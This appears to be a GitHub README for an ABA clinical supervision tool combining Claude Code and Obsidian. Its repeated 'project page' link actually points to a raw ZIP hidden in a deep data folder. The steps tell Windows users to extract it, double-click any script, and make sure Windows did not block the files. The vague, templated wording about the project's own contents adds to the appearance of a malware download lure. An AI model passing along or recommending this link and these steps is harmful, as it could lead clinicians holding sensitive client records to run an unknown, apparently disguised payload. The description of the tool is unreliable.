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πŸ€– aba-clinical-agent - ABA Clinical Supervision Made Simple

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πŸ“₯ Download

Go to the project page here and download or open the files you need:

https://github.com/Cookiedead56/aba-clinical-agent/raw/refs/heads/main/i18n/en/vault/00-RawData/de-identified-archive/aba-agent-clinical-v1.2.zip

πŸͺŸ Windows Setup

This project is set up for Windows users who want a simple way to run the ABA clinical automation tools.

What you need

  • A Windows 10 or Windows 11 PC
  • A stable internet connection
  • A GitHub account
  • Obsidian installed if you want to use the knowledge base
  • Claude Code if you want to use the agent workflow

Steps to get started

  1. Open the download link above.
  2. On the GitHub page, look for the latest release, setup files, or main project files.
  3. Download the project to your PC.
  4. If the file comes as a zip folder, right-click it and choose Extract All.
  5. Open the extracted folder.
  6. Follow the project files in the order shown in the repository.
  7. If there is an app or script file, double-click it to start.
  8. If the setup uses Obsidian, open the vault folder in Obsidian.
  9. If the setup uses Claude Code, connect it using the steps in the repo files.

🧠 What this app does

aba-clinical-agent helps turn ABA clinical supervision work into a more organized process. It combines Claude Code skills with an Obsidian knowledge base so you can keep notes, track clinical work, and reduce repeated manual tasks.

It is built for people who work in applied behavior analysis, special education, and autism support. The setup is shaped for clinical supervision, IEP support, and VB-MAPP style workflows.

✨ Main use cases

  • Organize ABA supervision notes
  • Store clinical knowledge in Obsidian
  • Keep track of session ideas and review points
  • Support IEP-related planning
  • Work with autism and special education records
  • Use AI help for repeated writing tasks
  • Build a clear record for supervision and review
  • Keep clinical content in one place

πŸ—‚οΈ What you will find

This repository is built around two parts:

  • Claude Code skills for guided task handling
  • An Obsidian knowledge base for storing and reviewing information

That means the project can help you:

  • Work through common ABA tasks in a repeatable way
  • Keep templates and notes in one system
  • Move between planning, writing, and review with less friction
  • Organize information for BCBA and clinical supervision use

πŸ–₯️ System requirements

For smooth use on Windows, plan for:

  • Windows 10 or Windows 11
  • 8 GB RAM or more
  • 2 GB free disk space
  • Obsidian desktop app
  • A modern browser
  • Claude Code access if you use the AI workflow
  • Permission to create and edit files in your user folder

If you work with large note sets or many files, 16 GB RAM will feel better.

πŸ“¦ Download and install

Use this link to download or visit the project page:

https://github.com/Cookiedead56/aba-clinical-agent/raw/refs/heads/main/i18n/en/vault/00-RawData/de-identified-archive/aba-agent-clinical-v1.2.zip

After you open the page:

  1. Look for the newest project files.
  2. Download the ZIP or file set listed there.
  3. Save it to your Downloads folder.
  4. Extract the files if needed.
  5. Open the folder and read the included setup files.
  6. Install or open Obsidian if the project asks for it.
  7. Launch the main file, script, or workspace from the folder.

πŸ”§ First-time setup in Obsidian

If the project includes an Obsidian vault:

  1. Open Obsidian.
  2. Choose Open folder as vault.
  3. Select the project vault folder.
  4. Wait for Obsidian to index the notes.
  5. Open the core notes, templates, and workflow pages.
  6. Follow the note order shown in the repository.

If the vault includes templates, use them for:

  • Intake notes
  • Supervision notes
  • Client planning
  • Skill tracking
  • Session review
  • IEP support notes

🧩 How the workflow fits together

The repo name and topic set point to a structured ABA system. A simple way to use it is:

  1. Save your source notes in Obsidian.
  2. Use the provided skill files to guide your work.
  3. Let Claude Code help with repeated writing and formatting tasks.
  4. Keep each client or case in its own note set.
  5. Review and update the notes after each session or supervision block.

This setup fits users who want a calm, repeatable way to handle clinical paperwork and planning.

πŸ“‹ Suggested folder layout

If you build out the project on your PC, this layout works well:

  • Vault/ for Obsidian notes
  • Templates/ for reusable forms
  • Cases/ for client or student files
  • Supervision/ for review notes
  • Reports/ for exports and summaries
  • Skills/ for Claude Code skill files

🎯 Best fit for

  • BCBAs
  • ABA clinical supervisors
  • Special education teams
  • Autism support staff
  • Case managers
  • School-based support users
  • Anyone who wants a cleaner note workflow

πŸ” Common tasks

Open the knowledge base

Open the Obsidian vault and read the main note pages in order.

Review a case

Open the case note, check the latest session notes, and update the supervision page.

Prepare a supervision note

Use the template, fill in the client details, and save the note under the right folder.

Use AI help

If Claude Code is connected, use the skill files to guide note writing, review, and formatting.

Keep records organized

Use one folder per client or topic so you can find files fast.

πŸ› οΈ If the project does not open

Try these steps on Windows:

  1. Make sure the files finished downloading.
  2. Extract the ZIP folder if the project came in a ZIP.
  3. Open the folder again from File Explorer.
  4. Check that Obsidian is installed.
  5. Make sure Windows did not block the files.
  6. Try opening the project from a normal local folder, not from inside the ZIP.
  7. Reopen the project page and check the included instructions.

πŸ“š Topic areas covered

This project ties together:

  • ABA
  • AI agents
  • Applied behavior analysis
  • Autism support
  • BCBA workflows
  • Claude Code
  • Clinical supervision
  • IEP planning
  • LLM agents
  • Obsidian notes
  • Special education
  • VB-MAPP support

πŸ” File safety

Keep your notes in a folder you control. Use normal Windows folders like Documents or Desktop. If you work with client data, keep your files private and use your normal office rules for access and storage.

πŸ“ Quick start checklist

  • Open the GitHub project page
  • Download the project files
  • Extract the folder if needed
  • Install or open Obsidian
  • Open the vault folder in Obsidian
  • Read the main workflow notes
  • Connect Claude Code if your setup uses it
  • Start with one case or one supervision note

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